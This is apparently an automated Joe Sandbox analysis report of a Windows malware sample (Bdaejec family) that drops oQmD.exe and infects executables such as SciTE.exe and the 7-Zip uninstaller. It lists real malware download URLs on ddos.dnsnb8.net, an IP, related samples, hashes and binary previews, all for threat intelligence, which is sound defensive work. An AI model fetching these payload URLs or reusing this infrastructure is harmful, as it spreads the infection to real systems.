http://www.rftp.comJosiah	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.activestate.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rartS	oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	oQmD.exe, 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmp, oQmD.exe, 00000002.00000003.1632073114.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.live.c	oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarf=Q	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://upx.sf.net	Amcache.hve.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.raro	oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.scintilla.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rart	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.develop.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.spaceblue.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarI	oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.baanboard.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rari	oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/amData	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarAppData	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1488690
Start date and time:	2024-08-06 12:33:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1hdqYXYJkr.exe renamed because original name is a hash value
Original Sample Name:	08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@7/15@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 15 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:34:11	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	Bank Form.scr.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	npukfztj.biz/rxgykrbfdsub
	O1hktZEwpg.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	0x21.in/_az/
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	7Y18r(216).exe.dll	Get hash	malicious	Bdaejec, Sality	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	builder_Release.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	BOTBINARY.EXE.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k4.rar
	BkPack.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(212).exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(216).exe.dll	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	builder_Release.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	BOTBINARY.EXE.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	i2RndFIwSG.lnk	Get hash	malicious	PureLog Stealer	Browse	52.22.41.97
	https://www.intimissimi.com/uk/	Get hash	malicious	Unknown	Browse	34.197.96.27
	154.216.17.9-skid.x86_64-2024-08-04T06_23_14.elf	Get hash	malicious	Mirai, Moobot	Browse	54.139.242.143
	45.66.231.148-mips-2024-07-31T23_07_02.elf	Get hash	malicious	Unknown	Browse	44.223.193.61
	45.66.231.148-mipsel-2024-07-30T12_25_27.elf	Get hash	malicious	Unknown	Browse	54.145.127.6
	Bank Form.scr.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	44.221.84.105
	77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elf	Get hash	malicious	Mirai, Moobot	Browse	107.23.89.32
	77.90.35.9-skid.sh4-2024-07-30T07_10_53.elf	Get hash	malicious	Mirai, Moobot	Browse	44.207.141.82
	ORDER883274777724884pdf.vbs	Get hash	malicious	AveMaria, PrivateLoader	Browse	3.5.25.225
	(No subject) (48).eml	Get hash	malicious	Unknown	Browse	44.205.122.114

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\oQmD.exe	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse
	7Y18r(212).exe	Get hash	malicious	Bdaejec	Browse
	7Y18r(216).exe.dll	Get hash	malicious	Bdaejec, Sality	Browse
	7Y18r(223).exe	Get hash	malicious	Bdaejec	Browse
	builder_Release.exe	Get hash	malicious	Bdaejec	Browse
	A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	BOTBINARY.EXE.exe	Get hash	malicious	Bdaejec	Browse
	BkPack.exe	Get hash	malicious	Bdaejec	Browse
	bss.exe	Get hash	malicious	Bdaejec	Browse
	C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe	Get hash	malicious	Bdaejec, BitCoin Miner, Xmrig	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oQmD.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590864781050491
Encrypted:	false
SSDEEP:	384:1FBSjXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:0dQGPL4vzZq2o9W7GsxBbPr
MD5:	3DDB52AB7F3E3B75FFEE7FA7BA0FA92B
SHA1:	BD525BA27163B1E417B458CEE575B75B7CA38339
SHA-256:	08660C312C5B94E8E7CF9FC7E7598298C970697F94B4EF1BBF67E0290940D473
SHA-512:	95EE1277F25E828B94BB581126E898BD0EB860504E6D6223774480BB686700F53CCB668A7570F9835AB69DA8C3F1D55FE5F601C6EFDAF9773D6EB17D08D3ADD9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oQmD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.73134352412953
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	8F7FF28DE0C7DE762C0FEE4D761D325E
SHA1:	D562A865FDF740AC1C9DAE4C374F40640FEBAC92
SHA-256:	2D9794B1DCF7E9AA26DD26EEF99BD0BFD5602165FAB86C6FEE0D3A498282F4D9
SHA-512:	1D62427867F0B0971032FEEB938DF3F133EA11828E5A5FBBC81587E8A13E3AB23A7AC558CC552168F2C331C9E02746DC7541812374780F4D62E85E977F4E3892
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oQmD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.3659167052102585
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdn6QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdn5GCq2iW7z
MD5:	ED83F296076DC089180D82A4997748D4
SHA1:	DCF12C203640D10766220A0399E74C64C3241C24
SHA-256:	054FF234650F96F2B243CD1A3F6992418A4B1ADF83AF6F422C6DF763C96D5BA5
SHA-512:	08988B47BC4D3A664C7BE1C88AB223E2E09781FAEF882506E080929514BB3463E7C0C5B88A5A9BD93DE092BC8F10F634225567354DAB00A22008E9F4C6EFAF2A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1hdqYXYJkr.exe_daa64bb1a2bf612b38b7f7aa812fc6a444b21_2bdd8500_db3022ad-b317-4e1c-8e29-ab1542d0debd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7083428006526343
Encrypted:	false
SSDEEP:	192:VtBcQITJYh0BU/5j+ju1zuiFCZ24IO8okW:m/TyiBU/AjczuiFCY4IO8S
MD5:	3CA5A73D589F1C4AA12E878F03F58E02
SHA1:	2AE496E30DA7A33BAC6D2E2BF9A033FA590BBE99
SHA-256:	D943813F03034CB06024A0731AAACACA8821942708B35BECA91DE7381AC68413
SHA-512:	434B398BC6654173D0DB83C016B455714170A44B998E75B2709B51D8F757FE61F840520E05381EE398581564C14F611252E3486CADD6004705E1F895EDC41DD7
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.2.2.8.6.7.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.3.5.6.7.9.6.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.3.0.2.2.a.d.-.b.3.1.7.-.4.e.1.c.-.8.e.2.9.-.a.b.1.5.4.2.d.0.d.e.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.9.2.5.3.6.4.-.6.8.2.7.-.4.2.8.7.-.b.a.e.b.-.e.3.5.4.d.1.2.e.c.3.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.h.d.q.Y.X.Y.J.k.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.4.-.0.0.0.1.-.0.0.1.4.-.e.2.9.4.-.0.4.2.1.e.c.e.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.e.b.7.5.c.a.4.5.0.3.8.3.e.a.e.1.7.6.8.f.d.e.f.0.b.a.4.3.d.2.0.0.0.0.f.f.f.f.!.0.0.0.0.1.a.1.3.f.3.f.b.4.b.8.c.1.9.4.7.8.2.0.4.e.1.9.1.2.6.d.b.d.8.d.2.f.8.1.c.f.d.b.e.!.1.h.d.q.Y.X.Y.J.k.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oQmD.exe_255a301624dc5569e9d7286780ab2f8150a4729b_c31cdb9f_3aee8d14-b12e-4a74-89dc-f6558bf00748\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9702724759302217
Encrypted:	false
SSDEEP:	192:XPZbKOTi01UXeFQj0/ljzuiFCZ24IO89v:dbTp1meFQjazuiFCY4IO89
MD5:	BAFA9B53BB4F8B0E2C1CC16D6970F5C6
SHA1:	D4607369C9551F3D4B84CB83035AB9FE7D21F8DA
SHA-256:	E12FE8F3461996EB2AFB27D4748BFEAFD317AB47C50A083CBDC1DA47A3B3E06F
SHA-512:	E9CF5E44192033DB2EB1B154EC3F75E54F347D1AF6FEC065F398152D240B51820E07C0E5619864468865627BD435A093C554C6A12654F7452F2B76E64659C65A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.6.7.5.1.4.3.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.7.2.2.0.1.7.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.e.e.8.d.1.4.-.b.1.2.e.-.4.a.7.4.-.8.9.d.c.-.f.6.5.5.8.b.f.0.0.7.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.6.c.0.2.3.1.-.5.a.e.0.-.4.8.a.b.-.9.3.8.e.-.5.a.5.3.8.1.2.a.2.d.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.Q.m.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.c.-.0.0.0.1.-.0.0.1.4.-.b.c.7.5.-.1.c.2.1.e.c.e.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.a.5.5.0.b.5.d.1.6.c.c.7.6.6.3.2.1.d.4.5.3.0.0.6.4.c.7.5.a.5.9.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.o.Q.m.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BF2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 6 10:33:56 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	163544
Entropy (8bit):	1.7934771350840615
Encrypted:	false
SSDEEP:	768:pJ6QBtpkGp2Jgdjo8z8mwlcqxSKqxhYXm6lO6:vlkid98mwl1xSKqxhYXm6lf
MD5:	EFFF2B7D98CDCB11866C53746F3184C0
SHA1:	5F16ED9745D0E027F35E26BC0704B15B698B7B80
SHA-256:	296A1EC0D858FBF6773009836DCA1BE0DCC5FAD8D608812C24D28C855B3A2C1C
SHA-512:	0CD9B1975B337E3894A5023C8B7640FD7C299357C41E537E9E32D14DC91340791ADDD3CD15ADE4E777830B98CABCDCDB0C1ADAD1925B61BE1BEE5388A97B7E1F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............t.......................<...T ...........P..........`.......8...........T............=..8A........... ..........\|"..............................................................................eJ.......#......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D1C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8246
Entropy (8bit):	3.693904366662552
Encrypted:	false
SSDEEP:	192:R6l7wVeJkg67F6YbVv6NXgmfG+X/VpDT89b7ssfTpm:R6lXJD6Z6YB61gmfGQM7/fw
MD5:	A1079314EDA0E8D796F30D13D0853652
SHA1:	E2919D7C3A6DC8FC40C6683DEFEF68E120ED6FF1
SHA-256:	074C767974F4E7EE9A89C0508C37BF769EEDB97EBE6B1D2C03A61AFC0A527122
SHA-512:	9E604EE4E0FA66E3563BE2423BDD83CE237B4248F11663702454D517DB0EB34792E349E383C5D71A12EE42684E7BDFF09AAD88335FB62089907F11A350A78210
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D3C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.430514907655063
Encrypted:	false
SSDEEP:	48:cvIwWl8zsgJg77aI9zUf7WpW8VYyYm8M4JQCF9qR+q8umklgSydd:uIjfmI7CC7V6J+6klgSydd
MD5:	9AB75A15AA7E79248AC70D34FEF181D8
SHA1:	1CA8571BBDCDAD595C6EF8D4D9B8B44243056D43
SHA-256:	ED1E96AEB83534631952E32F5AC372DFB76D1041E83B29C7AC6F000A01A19DF7
SHA-512:	9C1A040E80BF11101D74785F3EDE52601FA4526540D0775CDFEECD355690358D59169C62FF3DE00F66B5561A7AC57D5CF349F466745683AB1017116654A930FE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="443616" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 6 10:33:52 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35276
Entropy (8bit):	1.7186184267694466
Encrypted:	false
SSDEEP:	192:F8i1cISmSO0s8kXtYb7nhlhWif8ZYWooU:GiN0srXtYb7nhlLf+YW
MD5:	7B8D092FF3112FEDCC4682B7A89A9749
SHA1:	607DD61B7492276D7898EBC045741061A501AD3A
SHA-256:	37F68B834AED8DA6F6390F117F0C3910AE7BEA5DF91E204EB269FCA89B897EAB
SHA-512:	BA3CA845E5EC8C670A191DBFAC8989BEA691B785455717E4FED63CB8D61E51530FAB2DBB0D3B81A25246F92BAA15A021BA84665664F49F4A8B5A081139CCA54E
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f........................X...............Z...........T.......8...........T...............<}......................................................................................................eJ......x.......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB98.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.7001988324726924
Encrypted:	false
SSDEEP:	192:R6l7wVeJLVPb6VX6Y9FSU9Jc4kGgmfK7/prQ89bWrsfbym:R6lXJt6N6YPSU9JcCgmfcfWwfv
MD5:	80990C44243963DBF53CFF3D9D1B579B
SHA1:	BB05C4E2719923E24E24EF7CB893DC04CB66A747
SHA-256:	59B06CD3D405B713EB201D8D4F7E8BAE8D7D9DE14DC815A6CB51AE155F9C1E36
SHA-512:	FCED77BCECB1C0B51EF36DB180C9AE75DE6ABEDFC2B48C4DF043E7A5CA1859E5FD85FE794BDD59C11125F9B04C62DB1ADEA76F86D1951CA997F80C32240994E1
Malicious:	false
